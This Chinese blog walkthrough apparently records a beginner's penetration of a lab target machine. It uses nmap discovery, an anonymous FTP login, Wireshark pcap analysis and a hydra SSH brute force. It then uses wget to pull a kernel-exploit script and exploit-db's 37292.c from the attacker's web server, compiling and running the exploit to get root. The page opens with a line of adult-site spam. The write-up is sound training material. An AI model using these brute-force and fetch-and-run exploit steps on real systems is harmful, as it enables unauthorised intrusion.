国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

一次零基礎靶機滲透細節(jié)全程記錄

這篇具有很好參考價值的文章主要介紹了一次零基礎靶機滲透細節(jié)全程記錄。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、打靶總流程

1.確定目標:

????????在本靶場中,確定目標就是使用nmap進行ip掃描,確定ip即為目標,只是針對此靶場而言。其他實戰(zhàn)中確定目標的方式包括nmap進行掃描,但不局限于這個nmap。

2.信息收集:

????????比如平常挖洞使用fofa,天眼查,ip域名等進行查,在我們這個靶場中比如信息收集包括查看源碼,使用工具dirb等。

3.發(fā)現(xiàn)漏洞:

????????那些理論比如sql注入,文件上傳等,或者找到相關的系統(tǒng)信息,去網(wǎng)上找相關的exp這些都是為了拿到webshell。

4.漏洞利用:

????????漏洞利用就是使用漏洞拿到webshell。

5.權限提升:

????????權限提升,就是所謂的提權,因為一般進入拿到webshell后進入到服務器了都是低權限,在接下來的靶中我們的目標都是拿到root權限,所以拿到webshell后是低權限用戶,這個時候我們需要一系列的方式進行提權,最后拿到root權限,即為結束。

二、打靶實例詳解


文章內(nèi)的靶機及腳本關注后私信獲取

????????1.首先將靶機以及kali啟動。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

?????????2.注意將兩者的網(wǎng)絡適配器均調(diào)整為NAT模式(確保二者是在同一個網(wǎng)段下)。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

?????????3.從kali中打開終端,執(zhí)行ip a命令查看kali的ip地址。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

????????4.使用nmap工具來確認要打的靶機的ip地址。?

nmap -sP 192.168.190.0/24

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 在上面掃描出的ip地址中,.1、.2、.254、.138都是kali自身的一些ip地址,所以在此確認要進行攻擊的靶機的ip地址為:192.168.190.139。

????????5.接下來繼續(xù)進行信息收集,信息收集的方面以及方式有很多,這里信息收集是針對此靶機的信息收集。

? ? ? ? 6.掃描靶機開放了哪些端口。

nmap -p- 192.168.190.139

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 可以看到此靶機開放了21、22、80端口。其中:開放了21端口ftp,可以想到可能存在弱口令;開放了22端口ssh,可以想到對其進行爆破,然后看到80端口web端,可以對其進行常見漏洞測試。?

? ? ? ? 7.對開放的各個端口的進行詳細查看。

nmap?-p- -sS -sV -A 192.168.190.139

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 8. 在各個端口的詳細信息中,可以看到21端口有個Anonymous登入成功過,因此可以嘗試進行弱口令登入,賬戶名和密碼都輸入為Anonymous進行嘗試。?

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 9.嘗試后發(fā)現(xiàn)確實存在弱口令問題,成功登錄了進去。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? ?10.登錄進去之后執(zhí)行l(wèi)s命令查看當前目錄下有哪些文件,來繼續(xù)進行信息收集。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? ?11.發(fā)現(xiàn)一個名為“l(fā)ol.pcap”的文件,我們將其下載到我們本地。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 12.發(fā)現(xiàn)是一個流量數(shù)據(jù),因此使用wireshark工具對其進行打開。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 13.打開后可以看到下面的內(nèi)容。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

????????14.我們隨便點擊一條流量數(shù)據(jù),點擊TCP追蹤流,可以看到下面的信息,但是并沒有發(fā)現(xiàn)有用的信息。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 15.?將其關閉后我們可以看到軟件上方的篩選信息,此時為0。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 16.將其更改成1后再進行TCP流追蹤,可以看到一個txt文件。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

????????17.此時想到最開始進行掃描的時候,靶機存在開放的80端口,因此想到對其進行搜索,發(fā)現(xiàn)搜索結果返回404,說明搜索的結果是沒用的。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ?18.回到流量工具內(nèi),將篩選框后面的1更改為2后繼續(xù)追蹤TCP流,根據(jù)其英文解釋,可以想到“sup3rs3cr3tdirlol”可能是一個文件的路徑,因此再次嘗試進行拼接。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

?????????19.拼接后網(wǎng)頁返回了下面的內(nèi)容。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 20.可以看到存在一個名為“roflmao”的文件,點擊后將其下載下來。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? ?21.來到下載路徑下后,使用file命令或者strings命令將文件打開。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 22.可以看到還原出來的內(nèi)容里存在下面的一句話,因此我們嘗試將獲得的信息再次進行拼接后搜索。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 23.再次進行拼接搜索后進入了下面的頁面。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? ?24.在這里點擊“good_luck”后進入了到了下面的頁面。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 25.?在此頁面內(nèi)又發(fā)現(xiàn)了一個txt文件,點擊后可以看到下面的內(nèi)容,這里就相當于是一個用戶名的字典,找到了有用的用戶名。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? ?26.在桌面上創(chuàng)建一個名為user的文檔來存儲這些用戶名。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 27.回到瀏覽器的前面的頁面,發(fā)現(xiàn)存在一個可能存在密碼的文件。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? ?28.進入后又發(fā)現(xiàn)了一個txt文件,打開后可以看到下面的內(nèi)容,因此可以想到密碼有可能是Good_job_:)也有可能是Pass.txt。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

?????????29.將猜想的可能的密碼也放入一個txt文檔中當作密碼的字典。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 30.?來到桌面路徑下使用hydra工具對其進行爆破,可以看到成功將用戶名和密碼爆破了出來。?

hydra -L user -P password 192.168.190.139 ssh

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 31.接下來就使用爆破出來的用戶名和密碼進行登錄,發(fā)現(xiàn)登錄成功了。?

ssh overflow@192.168.190.139

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 32.但是發(fā)現(xiàn)此時的權限是低權限:

  • id為:0 root ? ?
  • 0 < id < 1000 服務用戶: 為服務提供權限 ?
  • 1000 <= id <=60000 普通

????????因此還要進行提權,下面是linux提權的幾種方式:

  • 內(nèi)核提權---臟牛提權最為典型 ,內(nèi)核提權一般包括3個步驟,信息收集發(fā)現(xiàn)版本號,找到相關版本的exp,使用找到的exp對目標發(fā)起攻擊,完成提權功能。
  • 利用suid提權?
  • 利用sudo提權
  • mfs提權
  • mysql提權 包括udf mof提權方式

? ? ? ? 33.發(fā)現(xiàn)進入的是一個偽終端,因此還要將其轉換為真終端,執(zhí)行下面的命令就將其變成了真終端。

python -c 'import pty; pty.spawn("/bin/bash")'

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 34.接下來開始提權。

? ? ? ? 35.首先在本地開啟一個web服務。

python3 -m http.server 8083

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 35.?直接執(zhí)行下面的命令將腳本文件下載到靶機上,但是發(fā)現(xiàn)下載失敗了,因為此時權限不夠。

wget http://192.168.190.138:8083/les.sh

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 36.切換到tmp目錄下再次進行下載,發(fā)現(xiàn)下載成功了,因為其是一個臨時文件,所以在此目錄下的權限會高一些,因此就可以成功下載了。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ?37.下載完之后將web服務關閉,在終端內(nèi)按CTRL+z。?

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? 38.給其添加一個權限后進行執(zhí)行。

chmod +x les.sh

./les.sh

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 39.?這個腳本執(zhí)行后會檢測Linux內(nèi)核版本存在哪些漏洞,檢測出來的結果的顏色越深說明可以被利用的可能性越大。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 40.接下來進行exp的利用就可以了。

? ? ? ? 41.下面演示第二種提權方式。

? ? ? ? 42.可以通過自己獲取到Linux的版本信息,然后在kali內(nèi)進行搜索。

uname -a

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 43.獲取到版本信息后執(zhí)行下面的命令在kali內(nèi)進行搜索。

searchsploit Linux 4-Tr0ll 3.13.0

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 44.在此標紅的兩條就是滿足條件的。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 45.接下來的思路就是將本都的exp搞到靶機的服務器內(nèi)進行運行,就可以實現(xiàn)提權的效果。

? ? ? ? 46.獲取到exp的絕對路徑。

locate linux/local/37292.c

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 47.將其存放在桌面。

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 48.將其打開后就可以看到exp的內(nèi)容。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 49.?再從本地開啟web服務。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 50.?將exp下載到靶機。

wget http://192.168.190.138:8085/37292.c

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 51.下載完之后將web服務關閉,在終端內(nèi)按CTRL+z。?

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

? ? ? ? 52.將其進行編譯和執(zhí)行,此時再次查看權限,可以看到此時的權限就是root權限了。

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試

????????53.查看靶機內(nèi)的文件proof.txt,至此我們就成功拿下了靶機!??!

一次零基礎靶機滲透細節(jié)全程記錄,網(wǎng)絡安全,打靶,提權,kali,滲透測試文章來源地址http://www.zghlxwxcb.cn/news/detail-575743.html

到了這里,關于一次零基礎靶機滲透細節(jié)全程記錄的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 【網(wǎng)絡安全】記一次殺豬盤滲透實戰(zhàn)

    【網(wǎng)絡安全】記一次殺豬盤滲透實戰(zhàn)

    看起來非常假的網(wǎng)站,這個網(wǎng)站是沒有 cdn 的用的是 thinkphpk 框架搭建的。 先打一波 poc 沒有效果 訪問一下后臺直接在 url 后面加/admin。 一個開源的 cms 還沒有驗證碼嘗試用 burp 進行爆破,首先在火狐上設置代理 ip 為 127.0.0.1 代理端口為 8081。 Burp 上也要設置端口為 8081,將 In

    2024年02月03日
    瀏覽(19)
  • 網(wǎng)絡安全之滲透(基礎知識點)

    網(wǎng)絡安全之滲透(基礎知識點)

    1、 腳本語言 2、常見腳本語言 3、靜態(tài)腳本于動靜態(tài)腳本的區(qū)別: 3、 HTTP協(xié)議,HTTP代理 4、 CMS(B/S)內(nèi)容管理系統(tǒng) 5、 MD5(不可逆的,常見的MD5解密網(wǎng)站其實是將一些明文進行MD5加密,形成一個庫,在查詢的時候將密文與庫中的信息進行碰撞,最后得到明文) 零基礎入門 對

    2024年02月11日
    瀏覽(27)
  • 網(wǎng)絡安全(黑客)內(nèi)網(wǎng)滲透基礎知識

    網(wǎng)絡安全(黑客)內(nèi)網(wǎng)滲透基礎知識

    0x01 內(nèi)網(wǎng)概述 內(nèi)網(wǎng)也指局域網(wǎng)(Local Area Network,LAN)是指在某一區(qū)域內(nèi)由多臺計算機互聯(lián)成的計算機組。一般是方圓幾千米以內(nèi)。局域網(wǎng)可以實現(xiàn)文件管理、應用軟件共享、打印機共享、工作組內(nèi)的歷程安排、電子郵件和傳真通信服務等功能。 內(nèi)網(wǎng)是封閉型的,它可以由辦公

    2024年02月13日
    瀏覽(62)
  • 網(wǎng)絡安全|滲透測試入門學習,從零基礎入門到精通—滲透中的開發(fā)語言

    網(wǎng)絡安全|滲透測試入門學習,從零基礎入門到精通—滲透中的開發(fā)語言

    目錄 前面的話 開發(fā)語言 1、html 解析 2、JavaScript 用法 3、JAVA ? 特性 4、PHP 作用 PHP 能做什么? 5、C/C++ 使用 如何學習 關于在滲透中需要學習的語言第一點個人認為就是可以打一下HTML,JS那些基礎知識,磨刀不誤砍柴工。其次,了解基本的代碼后,就可以去學習相關的漏洞知

    2024年02月09日
    瀏覽(19)
  • 安全滲透測試網(wǎng)絡基礎知識之路由技術

    #1.靜態(tài)路由技術 ##1.1路由技術種類: 靜態(tài)路由技術、動態(tài)路由技術 ##1.2靜態(tài)路由原理 靜態(tài)路由是網(wǎng)絡中一種手動配置的路由方式,用于指定數(shù)據(jù)包在網(wǎng)絡中的傳輸路徑。與動態(tài)路由協(xié)議不同,靜態(tài)路由需要管理員手動配置路由表,指定目的網(wǎng)絡和下一跳路由器的關聯(lián)關系。

    2024年02月06日
    瀏覽(33)
  • 安全滲透測試之網(wǎng)絡基礎知識(IP地址)

    #1.IP地址介紹 注意:不同局域網(wǎng)需要有不同的網(wǎng)絡部分,通過網(wǎng)絡部分區(qū)別出網(wǎng)段/網(wǎng)絡; 局域網(wǎng)內(nèi)部,主機部分不能一樣,否則會出現(xiàn)地址沖突 范圍:0.0.0.0-255.255.255.255 表示:點分十進制 組成:由網(wǎng)絡部分和主機部分組成 192.168.1.1 1.1.1.1 255.254.188.2 二進制:00000000 11111111 十

    2024年02月08日
    瀏覽(26)
  • 零基礎自學網(wǎng)絡安全/網(wǎng)絡滲透攻防路線學習方法【建議收藏】

    零基礎自學網(wǎng)絡安全/網(wǎng)絡滲透攻防路線學習方法【建議收藏】

    1.這是一條堅持的道路,三分鐘的熱情可以放棄往下看了. 2.多練多想,不要離開了教程什么都不會了.最好看完教程自己獨立完成技術方面的開發(fā). 3.有時多google,baidu,我們往往都遇不到好心的大神,誰會無聊天天給你做解答. 4.遇到實在搞不懂的,可以先放放,以后再來解決. 1.web安全方

    2024年02月03日
    瀏覽(19)
  • 網(wǎng)絡安全|滲透測試入門學習,從零基礎入門到精通—收集信息篇

    網(wǎng)絡安全|滲透測試入門學習,從零基礎入門到精通—收集信息篇

    目錄 前面的話 1、收集域名信息 1.1、Whois查詢 ?編輯1.2、備案信息查詢 ?2、收集敏感信息 3、收集子域名信息 3.1、子域名檢測工具 3.2、搜索引擎枚舉 3.3、第三方聚合應用枚舉 3.4、證書透明度公開日志枚舉 本章小結 本人喜歡網(wǎng)絡完全的一些知識,自學一些?,F(xiàn)在寫出來和大

    2024年02月08日
    瀏覽(24)
  • 網(wǎng)絡安全|滲透測試入門學習,從零基礎入門到精通—動態(tài)分析技術工具OllyDbg界面介紹

    網(wǎng)絡安全|滲透測試入門學習,從零基礎入門到精通—動態(tài)分析技術工具OllyDbg界面介紹

    目錄 動態(tài)分析技術調(diào)試器 什么是OllyDbg OllyDbg能干什么 OllyDbg窗口介紹 1、反匯編面板窗口 2、信息面板窗口 3、數(shù)據(jù)面板窗口 4、寄存器面板窗口 5、棧面板窗口 動態(tài)分析技術中最重要的工具是調(diào)試器,分為用戶模式和內(nèi)核模式兩種類型。用戶模式調(diào)試器是指用來調(diào)試用戶模式

    2024年02月11日
    瀏覽(23)
  • lampiao靶機滲透測試

    lampiao靶機滲透測試

    一、前言 ????????已經(jīng)好久沒有復習過主機滲透的相關知識了,上一次進行滲透的學習已經(jīng)是4個月前了,本篇對lampiao靶機進行一下滲透測試。? 二、信息采集 ?第一步先查看自身kali主機網(wǎng)段,ip為192.168.119.128,24位子網(wǎng)掩碼。 ? 接著使用下面的命令nmap掃描出靶機的ip為

    2024年02月13日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包